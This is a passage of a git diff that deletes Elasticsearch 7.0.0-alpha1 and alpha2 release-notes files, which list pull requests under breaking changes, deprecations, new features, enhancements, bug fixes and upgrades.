{es-pull}30618[#30618] - -Ranking:: -* Add ranking evaluation API {es-pull}27478[#27478] (issue: {es-issue}19195[#19195]) - -Recovery:: -* Allow to trim all ops above a certain seq# with a term lower than X, … {es-pull}31211[#31211] (issue: {es-issue}10708[#10708]) - -SQL:: -* SQL: Add basic support for ST_AsWKT geo function {es-pull}34205[#34205] -* SQL: Add support for SYS GEOMETRY_COLUMNS {es-pull}30496[#30496] (issue: {es-issue}29872[#29872]) - -Search:: -* Add “took” timing info to response for _msearch/template API {es-pull}30961[#30961] (issue: {es-issue}30957[#30957]) -* Expose the lucene Matches API to searches [ISSUE] {es-pull}29631[#29631] -* Add allow_partial_search_results flag to search requests with default setting true {es-pull}28440[#28440] (issue: {es-issue}27435[#27435]) -* Enable adaptive replica selection by default {es-pull}26522[#26522] (issue: {es-issue}24915[#24915]) - -Suggesters:: -* serialize suggestion responses as named writeables {es-pull}30284[#30284] (issue: {es-issue}26585[#26585]) - - - -[[enhancement-7.0.0-alpha1]] -[discrete] -=== Enhancements - -Aggregations:: -* Uses MergingDigest instead of AVLDigest in percentiles agg {es-pull}28702[#28702] (issue: {es-issue}19528[#19528]) - -Discovery-Plugins:: -* Rename discovery.zen.minimum_master_nodes [ISSUE] {es-pull}14058[#14058] - -Engine:: -* Remove versionType from translog {es-pull}31945[#31945] -* do retry if primary fails on AsyncAfterWriteAction {es-pull}31857[#31857] (issues: {es-issue}31716[#31716], {es-issue}31755[#31755]) -* handle AsyncAfterWriteAction exception before listener is registered {es-pull}31755[#31755] (issue: {es-issue}31716[#31716]) -* Use IndexWriter#flushNextBuffer to free memory {es-pull}27753[#27753] -* Remove pre 6.0.0 support from InternalEngine {es-pull}27720[#27720] - -Features/Indices APIs:: -* Add cluster-wide shard limit {es-pull}32856[#32856] (issue: {es-issue}20705[#20705]) -* Remove RestGetAllAliasesAction {es-pull}31308[#31308] (issue: {es-issue}31129[#31129]) -* Add rollover-creation-date setting to rolled over index {es-pull}31144[#31144] (issue: {es-issue}30887[#30887]) -* add is-write-index flag to aliases {es-pull}30942[#30942] -* Make index and bulk APIs work without types. 
{es-pull}29479[#29479] - -Features/Ingest:: -* ingest: Add ignore_missing property to foreach filter (#22147) {es-pull}31578[#31578] (issue: {es-issue}22147[#22147]) - -Features/Java High Level REST Client:: -* HLRC API for _termvectors {es-pull}32610[#32610] (issue: {es-issue}27205[#27205]) - -Features/Stats:: -* Stats to record how often the ClusterState diff mechanism is used successfully {es-pull}26973[#26973] - -Features/Watcher:: -* Watcher: Validate email adresses when storing a watch {es-pull}34042[#34042] (issue: {es-issue}33980[#33980]) - -Infra/Circuit Breakers:: -* Have circuit breaker succeed on unknown mem usage {es-pull}33125[#33125] (issue: {es-issue}31767[#31767]) -* Account for XContent overhead in in-flight breaker {es-pull}31613[#31613] -* Script Stats: Add compilation limit counter to stats {es-pull}26387[#26387] - -Infra/Core:: -* Add RunOnce utility class that executes a Runnable exactly once {es-pull}35484[#35484] -* Improved IndexNotFoundException's default error message {es-pull}34649[#34649] (issue: {es-issue}34628[#34628]) -* Set a bounded default for http.max_warning_header_count [ISSUE] {es-pull}33479[#33479] - -Infra/Packaging:: -* Choose JVM options ergonomically {es-pull}30684[#30684] - -Infra/REST API:: -* Remove hand-coded XContent duplicate checks {es-pull}34588[#34588] (issues: {es-issue}22073[#22073], {es-issue}22225[#22225], {es-issue}22253[#22253]) -* Add the `include_type_name` option to the search and document APIs. {es-pull}29506[#29506] (issue: {es-issue}15613[#15613]) -* Validate `op_type` for `_create` {es-pull}27483[#27483] - -Infra/Scripting:: -* Tests: Add support for custom contexts to mock scripts {es-pull}34100[#34100] -* Scripting: Reflect factory signatures in painless classloader {es-pull}34088[#34088] -* Handle missing values in painless {es-pull}32207[#32207] (issue: {es-issue}29286[#29286]) - -Infra/Settings:: -* Settings: Add keystore creation to add commands {es-pull}26126[#26126] - -Infra/Transport API:: -* Change BWC version for VerifyRepositoryResponse {es-pull}30796[#30796] (issue: {es-issue}30762[#30762]) - -Network:: -* Add cors support to NioHttpServerTransport {es-pull}30827[#30827] (issue: {es-issue}28898[#28898]) -* Reintroduce mandatory http pipelining support {es-pull}30820[#30820] -* Make http pipelining support mandatory {es-pull}30695[#30695] (issues: {es-issue}28898[#28898], {es-issue}29500[#29500]) -* Add nio http server transport {es-pull}29587[#29587] (issue: {es-issue}28898[#28898]) -* Add class for serializing message to bytes {es-pull}29384[#29384] (issue: {es-issue}28898[#28898]) -* Selectors operate on channel contexts {es-pull}28468[#28468] (issue: {es-issue}27260[#27260]) -* Unify nio read / write channel contexts {es-pull}28160[#28160] (issue: {es-issue}27260[#27260]) -* Create nio-transport plugin for NioTransport {es-pull}27949[#27949] (issue: {es-issue}27260[#27260]) -* Add elasticsearch-nio jar for base nio classes {es-pull}27801[#27801] (issue: {es-issue}27802[#27802]) - -Ranking:: -* Add k parameter to PrecisionAtK metric {es-pull}27569[#27569] - -SQL:: -* SQL: Introduce support for NULL values {es-pull}34573[#34573] (issue: {es-issue}32079[#32079]) - -Search:: -* Make limit on number of expanded fields configurable {es-pull}35284[#35284] (issues: {es-issue}26541[#26541], {es-issue}34778[#34778]) -* Search: Simply SingleFieldsVisitor {es-pull}34052[#34052] -* Don't count hits via the collector if the hit count can be computed from index stats. 
{es-pull}33701[#33701] -* Limit the number of concurrent requests per node {es-pull}31206[#31206] (issue: {es-issue}31192[#31192]) -* Default max concurrent search req. numNodes * 5 {es-pull}31171[#31171] (issues: {es-issue}30783[#30783], {es-issue}30994[#30994]) -* Change ScriptException status to 400 (bad request) {es-pull}30861[#30861] (issue: {es-issue}12315[#12315]) -* Change default value to true for transpositions parameter of fuzzy query {es-pull}26901[#26901] -* Introducing "took" time (in ms) for `_msearch` {es-pull}23767[#23767] (issue: {es-issue}23131[#23131]) - -Snapshot/Restore:: -* #31608 Add S3 Setting to Force Path Type Access {es-pull}34721[#34721] (issue: {es-issue}31608[#31608]) - -Store:: -* add RemoveCorruptedShardDataCommand {es-pull}32281[#32281] (issues: {es-issue}31389[#31389], {es-issue}32279[#32279]) - -ZenDiscovery:: -* [Zen2] Introduce vote withdrawal {es-pull}35446[#35446] -* Zen2: Add basic Zen1 transport-level BWC {es-pull}35443[#35443] -* Zen2: Add diff-based publishing {es-pull}35290[#35290] -* [Zen2] Introduce auto_shrink_voting_configuration setting {es-pull}35217[#35217] -* Introduce transport API for cluster bootstrapping {es-pull}34961[#34961] -* [Zen2] Reconfigure cluster as its membership changes {es-pull}34592[#34592] (issue: {es-issue}33924[#33924]) -* Zen2: Fail fast on disconnects {es-pull}34503[#34503] -* [Zen2] Add storage-layer disruptions to CoordinatorTests {es-pull}34347[#34347] -* [Zen2] Add low-level bootstrap implementation {es-pull}34345[#34345] -* [Zen2] Gather votes from all nodes {es-pull}34335[#34335] -* Zen2: Add Cluster State Applier {es-pull}34257[#34257] -* [Zen2] Add safety phase to CoordinatorTests {es-pull}34241[#34241] -* [Zen2] Integrate FollowerChecker with Coordinator {es-pull}34075[#34075] -* Integrate LeaderChecker with Coordinator {es-pull}34049[#34049] -* Zen2: Trigger join when active master detected {es-pull}34008[#34008] -* Zen2: Update PeerFinder term on term bump {es-pull}33992[#33992] -* [Zen2] Calculate optimal cluster configuration {es-pull}33924[#33924] -* [Zen2] Introduce FollowersChecker {es-pull}33917[#33917] -* Zen2: Integrate publication pipeline into Coordinator {es-pull}33771[#33771] -* Zen2: Add DisruptableMockTransport {es-pull}33713[#33713] -* [Zen2] Implement basic cluster formation {es-pull}33668[#33668] -* [Zen2] Introduce LeaderChecker {es-pull}33024[#33024] -* Zen2: Add leader-side join handling logic {es-pull}33013[#33013] -* [Zen2] Add PeerFinder#onFoundPeersUpdated {es-pull}32939[#32939] -* [Zen2] Introduce PreVoteCollector {es-pull}32847[#32847] -* [Zen2] Introduce ElectionScheduler {es-pull}32846[#32846] -* [Zen2] Introduce ElectionScheduler {es-pull}32709[#32709] -* [Zen2] Add HandshakingTransportAddressConnector {es-pull}32643[#32643] (issue: {es-issue}32246[#32246]) -* [Zen2] Add UnicastConfiguredHostsResolver {es-pull}32642[#32642] (issue: {es-issue}32246[#32246]) -* Zen2: Cluster state publication pipeline {es-pull}32584[#32584] (issue: {es-issue}32006[#32006]) -* [Zen2] Introduce gossip-like discovery of master nodes {es-pull}32246[#32246] -* Add core coordination algorithm for cluster state publishing {es-pull}32171[#32171] (issue: {es-issue}32006[#32006]) -* Add term and config to cluster state {es-pull}32100[#32100] (issue: {es-issue}32006[#32006]) - - - -[[bug-7.0.0-alpha1]] -[discrete] -=== Bug fixes - -Aggregations:: -* Fix InternalAutoDateHistogram reproducible failure {es-pull}32723[#32723] (issue: {es-issue}32215[#32215]) - -Analysis:: -* Close #26771: beider_morse 
phonetic encoder failure when languageset unspecified {es-pull}26848[#26848] (issue: {es-issue}26771[#26771]) - -Authorization:: -* Empty GetAliases authorization fix {es-pull}34444[#34444] (issue: {es-issue}31952[#31952]) - -Docs Infrastructure:: -* Docs build fails due to missing nexus.png [ISSUE] {es-pull}33101[#33101] - -Features/Indices APIs:: -* Validate top-level keys for create index request (#23755) {es-pull}23869[#23869] (issue: {es-issue}23755[#23755]) - -Features/Ingest:: -* INGEST: Fix Deprecation Warning in Script Proc. {es-pull}32407[#32407] - -Features/Java High Level REST Client:: -* HLRC: Drop extra level from user parser {es-pull}34932[#34932] - -Features/Java Low Level REST Client:: -* Remove I/O pool blocking sniffing call from onFailure callback, add some logic around host exclusion {es-pull}27985[#27985] (issue: {es-issue}27984[#27984]) - -Features/Watcher:: -* Watcher: Ignore system locale/timezone in croneval CLI tool {es-pull}33215[#33215] - -Geo:: -* [build] Test `GeoShapeQueryTests#testPointsOnly` fails [ISSUE] {es-pull}27454[#27454] - -Infra/Core:: -* Ensure shard is refreshed once it's inactive {es-pull}27559[#27559] (issue: {es-issue}27500[#27500]) - -Infra/Settings:: -* Change format how settings represent lists / array {es-pull}26723[#26723] - -Infra/Transport API:: -* Remove version read/write logic in Verify Response {es-pull}30879[#30879] (issue: {es-issue}30807[#30807]) -* Enable muted Repository test {es-pull}30875[#30875] (issue: {es-issue}30807[#30807]) -* Bad regex in CORS settings should throw a nicer error {es-pull}29108[#29108] - -License:: -* Update versions for start_trial after backport {es-pull}30218[#30218] (issue: {es-issue}30135[#30135]) - -Mapping:: -* Ensure that field aliases cannot be used in multi-fields. 
{es-pull}32219[#32219] - -Network:: -* Adjust SSLDriver behavior for JDK11 changes {es-pull}32145[#32145] (issues: {es-issue}32122[#32122], {es-issue}32144[#32144]) -* Netty4SizeHeaderFrameDecoder error {es-pull}31057[#31057] -* Fix memory leak in http pipelining {es-pull}30815[#30815] (issue: {es-issue}30801[#30801]) -* Fix issue with finishing handshake in ssl driver {es-pull}30580[#30580] - -Search:: -* Ensure realtime `_get` and `_termvectors` don't run on the network thread {es-pull}33814[#33814] (issue: {es-issue}27500[#27500]) -* [bug] fuzziness custom auto {es-pull}33462[#33462] (issue: {es-issue}33454[#33454]) -* Fix inner hits retrieval when stored fields are disabled (_none_) {es-pull}33018[#33018] (issue: {es-issue}32941[#32941]) -* Set maxScore for empty TopDocs to Nan rather than 0 {es-pull}32938[#32938] -* Handle leniency for cross_fields type in multi_match query {es-pull}27045[#27045] (issue: {es-issue}23210[#23210]) -* Raise IllegalArgumentException instead if query validation failed {es-pull}26811[#26811] (issue: {es-issue}26799[#26799]) - -Security:: -* Handle 6.4.0+ BWC for Application Privileges {es-pull}32929[#32929] - -ZenDiscovery:: -* [Zen2] Remove duplicate discovered peers {es-pull}35505[#35505] - - -[[upgrade-7.0.0-alpha1]] -[discrete] -=== Upgrades - -Geo:: -* Upgrade JTS to 1.14.0 {es-pull}29141[#29141] (issue: {es-issue}29122[#29122]) - -Infra/Core:: -* Upgrade to a Lucene 8 snapshot {es-pull}33310[#33310] (issues: {es-issue}32899[#32899], {es-issue}33028[#33028], {es-issue}33309[#33309]) - -Network:: -* NETWORKING: Fix Netty Leaks by upgrading to 4.1.28 {es-pull}32511[#32511] (issue: {es-issue}32487[#32487]) diff --git a/docs/reference/release-notes/7.0.0-alpha2.asciidoc b/docs/reference/release-notes/7.0.0-alpha2.asciidoc deleted file mode 100644 index d9b23c9aad9..00000000000 --- a/docs/reference/release-notes/7.0.0-alpha2.asciidoc +++ /dev/null @@ -1,585 +0,0 @@ -[[release-notes-7.0.0-alpha2]] -== {es} version 7.0.0-alpha2 - -[[breaking-7.0.0-alpha2]] -[discrete] -=== Breaking changes - -Authentication:: -* Enhance Invalidate Token API {es-pull}35388[#35388] (issues: {es-issue}34556[#34556], {es-issue}35115[#35115]) - -Circuit Breakers:: -* Lower fielddata circuit breaker's default limit {es-pull}27162[#27162] (issue: {es-issue}27130[#27130]) - -CCR:: -* Change get autofollow patterns API response format {es-pull}36203[#36203] (issue: {es-issue}36049[#36049]) - -Index APIs:: -* Always enforce cluster-wide shard limit {es-pull}34892[#34892] (issues: {es-issue}20705[#20705], {es-issue}34021[#34021]) - -Ranking:: -* Forbid negative scores in function_score query {es-pull}35709[#35709] (issue: {es-issue}33309[#33309]) - -Scripting:: -* Delete deprecated getValues from ScriptDocValues {es-pull}36183[#36183] (issue: {es-issue}22919[#22919]) - -Search:: -* Remove the deprecated _termvector endpoint. 
{es-pull}36131[#36131] (issues: {es-issue}36098[#36098], {es-issue}8484[#8484]) -* Remove deprecated Graph endpoints {es-pull}35956[#35956] -* Validate metadata on `_msearch` {es-pull}35938[#35938] (issue: {es-issue}35869[#35869]) -* Make hits.total an object in the search response {es-pull}35849[#35849] (issue: {es-issue}33028[#33028]) -* Remove the distinction between query and filter context in QueryBuilders {es-pull}35354[#35354] (issue: {es-issue}35293[#35293]) -* Throw a parsing exception when boost is set in span_or query (#28390) {es-pull}34112[#34112] (issue: {es-issue}28390[#28390]) - -ZenDiscovery:: -* Best-effort cluster formation if unconfigured {es-pull}36215[#36215] - -[[breaking-java-7.0.0-alpha2]] -[discrete] -=== Breaking Java changes - -ZenDiscovery:: -* Make node field in JoinRequest private {es-pull}36405[#36405] - -[[deprecation-7.0.0-alpha2]] -[discrete] -=== Deprecations - -Core:: -* Deprecate use of scientific notation in epoch time parsing {es-pull}36691[#36691] -* Add backcompat for joda time formats {es-pull}36531[#36531] - -Machine Learning:: -* Deprecate X-Pack centric ML endpoints {es-pull}36315[#36315] (issue: {es-issue}35958[#35958]) - -Mapping:: -* Deprecate types in index API {es-pull}36575[#36575] (issues: {es-issue}35190[#35190], {es-issue}35790[#35790]) -* Deprecate uses of _type as a field name in queries {es-pull}36503[#36503] (issue: {es-issue}35190[#35190]) -* Deprecate types in update_by_query and delete_by_query {es-pull}36365[#36365] (issue: {es-issue}35190[#35190]) -* For msearch templates, make sure to use the right name for deprecation logging. {es-pull}36344[#36344] -* Deprecate types in termvector and mtermvector requests. {es-pull}36182[#36182] -* Deprecate types in update requests. {es-pull}36181[#36181] -* Deprecate types in document delete requests. {es-pull}36087[#36087] -* Deprecate types in get, exists, and multi get. {es-pull}35930[#35930] -* Deprecate types in search and multi search templates. {es-pull}35669[#35669] -* Deprecate types in explain requests. {es-pull}35611[#35611] -* Deprecate types in validate query requests. {es-pull}35575[#35575] -* Deprecate types in count and msearch. {es-pull}35421[#35421] (issue: {es-issue}34041[#34041]) - -Migration:: -* Deprecate X-Pack centric Migration endpoints {es-pull}35976[#35976] (issue: {es-issue}35958[#35958]) - -Monitoring:: -* Deprecate /_xpack/monitoring/* in favor of /_monitoring/* {es-pull}36130[#36130] (issue: {es-issue}35958[#35958]) - -Rollup:: -* Re-deprecate xpack rollup endpoints {es-pull}36451[#36451] (issue: {es-issue}36044[#36044]) -* Deprecate X-Pack centric rollup endpoints {es-pull}35962[#35962] (issue: {es-issue}35958[#35958]) - -Scripting:: -* Adds deprecation logging to ScriptDocValues#getValues. 
{es-pull}34279[#34279] (issue: {es-issue}22919[#22919]) -* Conditionally use java time api in scripting {es-pull}31441[#31441] - -Search:: -* Remove X-Pack centric graph endpoints {es-pull}36010[#36010] (issue: {es-issue}35958[#35958]) - -Security:: -* Deprecate X-Pack centric license endpoints {es-pull}35959[#35959] (issue: {es-issue}35958[#35958]) -* Deprecate /_xpack/security/* in favor of /_security/* {es-pull}36293[#36293] (issue: {es-issue}35958[#35958]) - -SQL:: -* Deprecate X-Pack SQL translate endpoint {es-pull}36030[#36030] -* Deprecate X-Pack centric SQL endpoints {es-pull}35964[#35964] (issue: {es-issue}35958[#35958]) - -Watcher:: -* Deprecate X-Pack centric watcher endpoints {es-pull}36218[#36218] (issue: {es-issue}35958[#35958]) - - -[[feature-7.0.0-alpha2]] -[discrete] -=== New features - -Analysis:: -* Add support for inlined user dictionary in Nori {es-pull}36123[#36123] (issue: {es-issue}35842[#35842]) -* Add a prebuilt ICU Analyzer {es-pull}34958[#34958] (issue: {es-issue}34285[#34285]) - -Java High Level REST Client:: -* Add rollup search {es-pull}36334[#36334] (issue: {es-issue}29827[#29827]) - -Java Low Level REST Client:: -* Make warning behavior pluggable per request {es-pull}36345[#36345] -* Add PreferHasAttributeNodeSelector {es-pull}36005[#36005] - -Geo:: -* Integrate Lucene's LatLonShape (BKD Backed GeoShapes) as default `geo_shape` indexing approach {es-pull}36751[#36751] (issue: {es-issue}35320[#35320]) -* Integrate Lucene's LatLonShape (BKD Backed GeoShapes) as default `geo_shape` indexing approach {es-pull}35320[#35320] (issue: {es-issue}32039[#32039]) - -Machine Learning:: -* Add delayed datacheck to the datafeed job runner {es-pull}35387[#35387] (issue: {es-issue}35131[#35131]) - -Mapping:: -* Make typeless APIs usable with indices whose type name is different from `_doc` {es-pull}35790[#35790] (issue: {es-issue}35190[#35190]) - -SQL:: -* Introduce HISTOGRAM grouping function {es-pull}36510[#36510] (issue: {es-issue}36509[#36509]) -* DATABASE() and USER() system functions {es-pull}35946[#35946] (issue: {es-issue}35863[#35863]) -* Introduce INTERVAL support {es-pull}35521[#35521] (issue: {es-issue}29990[#29990]) - -Search:: -* Add intervals query {es-pull}36135[#36135] (issues: {es-issue}29636[#29636], {es-issue}32406[#32406]) -* Added soft limit to open scroll contexts #25244 {es-pull}36009[#36009] (issue: {es-issue}25244[#25244]) - -[[enhancement-7.0.0-alpha2]] -[discrete] -=== Enhancements - -Aggregations:: -* Added keyed response to pipeline percentile aggregations 22302 {es-pull}36392[#36392] (issue: {es-issue}22302[#22302]) -* Enforce max_buckets limit only in the final reduction phase {es-pull}36152[#36152] (issues: {es-issue}32125[#32125], {es-issue}35921[#35921]) -* Histogram aggs: add empty buckets only in the final reduce step {es-pull}35921[#35921] -* Handles exists query in composite aggs {es-pull}35758[#35758] -* Added parent validation for auto date histogram {es-pull}35670[#35670] - -Analysis:: -* Allow word_delimiter_graph_filter to not adjust internal offsets {es-pull}36699[#36699] (issues: {es-issue}33710[#33710], {es-issue}34741[#34741]) -* Ensure TokenFilters only produce single tokens when parsing synonyms {es-pull}34331[#34331] (issue: {es-issue}34298[#34298]) - -Audit:: -* Add "request.id" to file audit logs {es-pull}35536[#35536] - -Authentication:: -* Invalidate Token API enhancements - HLRC {es-pull}36362[#36362] (issue: {es-issue}35388[#35388]) -* Add DEBUG/TRACE logs for LDAP bind {es-pull}36028[#36028] -* Add Tests for 
findSamlRealm {es-pull}35905[#35905] -* Add realm information for Authenticate API {es-pull}35648[#35648] -* Formal support for "password_hash" in Put User {es-pull}35242[#35242] (issue: {es-issue}34729[#34729]) - -Authorization:: -* Improve exact index matching performance {es-pull}36017[#36017] -* `manage_token` privilege for `kibana_system` {es-pull}35751[#35751] -* Grant .tasks access to kibana_system role {es-pull}35573[#35573] - -Build:: -* Sounds like typo in exception message {es-pull}35458[#35458] -* Allow set section in setup section of REST tests {es-pull}34678[#34678] - -CCR:: -* Add time since last auto follow fetch to auto follow stats {es-pull}36542[#36542] (issues: {es-issue}33007[#33007], {es-issue}35895[#35895]) -* Clean followed leader index UUIDs in auto follow metadata {es-pull}36408[#36408] (issue: {es-issue}33007[#33007]) -* Change AutofollowCoordinator to use wait_for_metadata_version {es-pull}36264[#36264] (issues: {es-issue}33007[#33007], {es-issue}35895[#35895]) -* Refactor AutoFollowCoordinator to track leader indices per remote cluster {es-pull}36031[#36031] (issues: {es-issue}33007[#33007], {es-issue}35895[#35895]) - -Core:: -* Override the JVM DNS cache policy {es-pull}36570[#36570] -* Replace usages of AtomicBoolean based block of code by the RunOnce class {es-pull}35553[#35553] (issue: {es-issue}35489[#35489]) -* Added wait_for_metadata_version parameter to cluster state api. {es-pull}35535[#35535] -* Extract RunOnce into a dedicated class {es-pull}35489[#35489] -* Introduce elasticsearch-core jar {es-pull}28191[#28191] (issue: {es-issue}27933[#27933]) -* Rename core module to server {es-pull}28180[#28180] (issue: {es-issue}27933[#27933]) - -CRUD:: -* Rename seq# powered optimistic concurrency control parameters to ifSeqNo/ifPrimaryTerm {es-pull}36757[#36757] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Expose Sequence Number based Optimistic Concurrency Control in the rest layer {es-pull}36721[#36721] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Add doc's sequence number + primary term to GetResult and use it for updates {es-pull}36680[#36680] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Add seq no powered optimistic locking support to the index and delete transport actions {es-pull}36619[#36619] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) - -Distributed:: -* [Close Index API] Mark shard copy as stale if needed during shard verification {es-pull}36755[#36755] -* [Close Index API] Refactor MetadataIndexStateService {es-pull}36354[#36354] (issue: {es-issue}36249[#36249]) -* [Close Index API] Add TransportShardCloseAction for pre-closing verifications {es-pull}36249[#36249] -* TransportResyncReplicationAction should not honour blocks {es-pull}35795[#35795] (issues: {es-issue}35332[#35332], {es-issue}35597[#35597]) -* Expose all permits acquisition in IndexShard and TransportReplicationAction {es-pull}35540[#35540] (issue: {es-issue}33888[#33888]) -* [RCI] Check blocks while having index shard permit in TransportReplicationAction {es-pull}35332[#35332] (issue: {es-issue}33888[#33888]) - -Engine:: -* Add sequence numbers based optimistic concurrency control support to Engine {es-pull}36467[#36467] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Require soft-deletes when access changes snapshot {es-pull}36446[#36446] -* Use delCount of SegmentInfos to calculate numDocs {es-pull}36323[#36323] -* Always configure soft-deletes field of IndexWriterConfig {es-pull}36196[#36196] (issue: 
{es-issue}36141[#36141]) -* Enable soft-deletes by default on 7.0.0 or later {es-pull}36141[#36141] -* Always return false from `refreshNeeded` on ReadOnlyEngine {es-pull}35837[#35837] (issue: {es-issue}35785[#35785]) -* Add a `_freeze` / `_unfreeze` API {es-pull}35592[#35592] (issue: {es-issue}34352[#34352]) -* [RCI] Add IndexShardOperationPermits.asyncBlockOperations(ActionListener) {es-pull}34902[#34902] (issue: {es-issue}33888[#33888]) - -Features:: -* Simplify deprecation issue levels {es-pull}36326[#36326] - -Index APIs:: -* Add cluster-wide shard limit warnings {es-pull}34021[#34021] (issues: {es-issue}20705[#20705], {es-issue}32856[#32856]) - -Ingest:: -* Grok fix duplicate patterns JAVACLASS and JAVAFILE {es-pull}35886[#35886] -* Implement Drop Processor {es-pull}32278[#32278] (issue: {es-issue}23726[#23726]) - -Java High Level REST Client:: -* Add get users action {es-pull}36332[#36332] (issue: {es-issue}29827[#29827]) -* Add delete template API {es-pull}36320[#36320] (issue: {es-issue}27205[#27205]) -* Implement get-user-privileges API {es-pull}36292[#36292] -* Get Deprecation Info API {es-pull}36279[#36279] (issue: {es-issue}29827[#29827]) -* Add support for Follow Stats API {es-pull}36253[#36253] (issue: {es-issue}33824[#33824]) -* Add support for CCR Stats API {es-pull}36213[#36213] (issue: {es-issue}33824[#33824]) -* Put Role {es-pull}36209[#36209] (issue: {es-issue}29827[#29827]) -* Add index templates exist API {es-pull}36132[#36132] (issue: {es-issue}27205[#27205]) -* Add support for CCR Get Auto Follow Pattern apis {es-pull}36049[#36049] (issue: {es-issue}33824[#33824]) -* Add support for CCR Delete Auto Follow Pattern API {es-pull}35981[#35981] (issue: {es-issue}33824[#33824]) -* Remove fromXContent from IndexUpgradeInfoResponse {es-pull}35934[#35934] -* Add delete expired data API {es-pull}35906[#35906] (issue: {es-issue}29827[#29827]) -* Execute watch API {es-pull}35868[#35868] (issue: {es-issue}29827[#29827]) -* Add ability to put user with a password hash {es-pull}35844[#35844] (issue: {es-issue}35242[#35242]) -* Add ML find file structure API {es-pull}35833[#35833] (issue: {es-issue}29827[#29827]) -* Add support for get roles API {es-pull}35787[#35787] (issue: {es-issue}29827[#29827]) -* Added support for CCR Put Auto Follow Pattern API {es-pull}35780[#35780] (issue: {es-issue}33824[#33824]) -* XPack ML info action {es-pull}35777[#35777] (issue: {es-issue}29827[#29827]) -* ML Delete event from Calendar {es-pull}35760[#35760] (issue: {es-issue}29827[#29827]) -* Add ML revert model snapshot API {es-pull}35750[#35750] (issue: {es-issue}29827[#29827]) -* ML Get Calendar Events {es-pull}35747[#35747] (issue: {es-issue}29827[#29827]) -* Add high-level REST client API for `_freeze` and `_unfreeze` {es-pull}35723[#35723] (issue: {es-issue}34352[#34352]) -* Fix issue in equals impl for GlobalOperationPrivileges {es-pull}35721[#35721] -* ML Delete job from calendar {es-pull}35713[#35713] (issue: {es-issue}29827[#29827]) -* ML Add Event To Calendar API {es-pull}35704[#35704] (issue: {es-issue}29827[#29827]) -* Add ML update model snapshot API (#35537) {es-pull}35694[#35694] (issue: {es-issue}29827[#29827]) -* Add support for CCR Unfollow API {es-pull}35693[#35693] (issue: {es-issue}33824[#33824]) -* Clean up PutLicenseResponse {es-pull}35689[#35689] (issue: {es-issue}35547[#35547]) -* Clean up StartBasicResponse {es-pull}35688[#35688] (issue: {es-issue}35547[#35547]) -* Add support for put privileges API {es-pull}35679[#35679] -* ML Add Job to Calendar API 
{es-pull}35666[#35666] (issue: {es-issue}29827[#29827]) -* Add support for CCR Resume Follow API {es-pull}35638[#35638] (issue: {es-issue}33824[#33824]) -* Add support for get application privileges API {es-pull}35556[#35556] (issue: {es-issue}29827[#29827]) -* Clean up XPackInfoResponse class and related tests {es-pull}35547[#35547] -* Add parameters to stopRollupJob API {es-pull}35545[#35545] (issue: {es-issue}34811[#34811]) -* Add ML delete model snapshot API {es-pull}35537[#35537] (issue: {es-issue}29827[#29827]) -* Add get watch API {es-pull}35531[#35531] (issue: {es-issue}29827[#29827]) -* Add ML Update Filter API {es-pull}35522[#35522] (issue: {es-issue}29827[#29827]) -* Add ml get filters api {es-pull}35502[#35502] (issue: {es-issue}29827[#29827]) -* Add ML get model snapshots API {es-pull}35487[#35487] (issue: {es-issue}29827[#29827]) -* Add "_has_privileges" API to Security Client {es-pull}35479[#35479] (issue: {es-issue}29827[#29827]) -* Add Delete Privileges API to HLRC {es-pull}35454[#35454] (issue: {es-issue}29827[#29827]) -* Add support for CCR Put Follow API {es-pull}35409[#35409] -* Add ML delete filter action {es-pull}35382[#35382] (issue: {es-issue}29827[#29827]) -* Add delete user action {es-pull}35294[#35294] (issue: {es-issue}29827[#29827]) -* HLRC for _mtermvectors {es-pull}35266[#35266] (issues: {es-issue}27205[#27205], {es-issue}33447[#33447]) -* Reindex API with wait_for_completion false {es-pull}35202[#35202] (issue: {es-issue}27205[#27205]) -* Add watcher stats API {es-pull}35185[#35185] (issue: {es-issue}29827[#29827]) -* HLRC support for getTask {es-pull}35166[#35166] (issue: {es-issue}27205[#27205]) -* Add GetRollupIndexCaps API {es-pull}35102[#35102] (issue: {es-issue}29827[#29827]) -* HLRC: migration api - upgrade {es-pull}34898[#34898] (issue: {es-issue}29827[#29827]) -* Add stop rollup job support to HL REST Client {es-pull}34702[#34702] (issue: {es-issue}29827[#29827]) -* Bulk Api support for global parameters {es-pull}34528[#34528] (issue: {es-issue}26026[#26026]) -* Add delete rollup job support to HL REST Client {es-pull}34066[#34066] (issue: {es-issue}29827[#29827]) -* Add support for get license basic/trial status API {es-pull}33176[#33176] (issue: {es-issue}29827[#29827]) -* Add machine learning open job {es-pull}32860[#32860] (issue: {es-issue}29827[#29827]) -* Add ML HLRC wrapper and put_job API call {es-pull}32726[#32726] -* Add Get Snapshots High Level REST API {es-pull}31537[#31537] (issue: {es-issue}27205[#27205]) - -Java Low Level REST Client:: -* On retry timeout add root exception {es-pull}25576[#25576] - -Monitoring:: -* Make Exporters Async {es-pull}35765[#35765] (issue: {es-issue}35743[#35743]) - -Geo:: -* Adds a name of the field to geopoint parsing errors {es-pull}36529[#36529] (issue: {es-issue}15965[#15965]) -* Add support to ShapeBuilders for building Lucene geometry {es-pull}35707[#35707] (issue: {es-issue}35320[#35320]) -* Add ST_WktToSQL function {es-pull}35416[#35416] (issue: {es-issue}29872[#29872]) - -License:: -* Require acknowledgement to start_trial license {es-pull}30135[#30135] (issue: {es-issue}30134[#30134]) - -Machine Learning:: -* Create the ML annotations index {es-pull}36731[#36731] (issues: {es-issue}26034[#26034], {es-issue}33376[#33376]) -* Split in batches and migrate all jobs and datafeeds {es-pull}36716[#36716] (issue: {es-issue}32905[#32905]) -* Add cluster setting to enable/disable config migration {es-pull}36700[#36700] (issue: {es-issue}32905[#32905]) -* Add audits when deprecation warnings occur with 
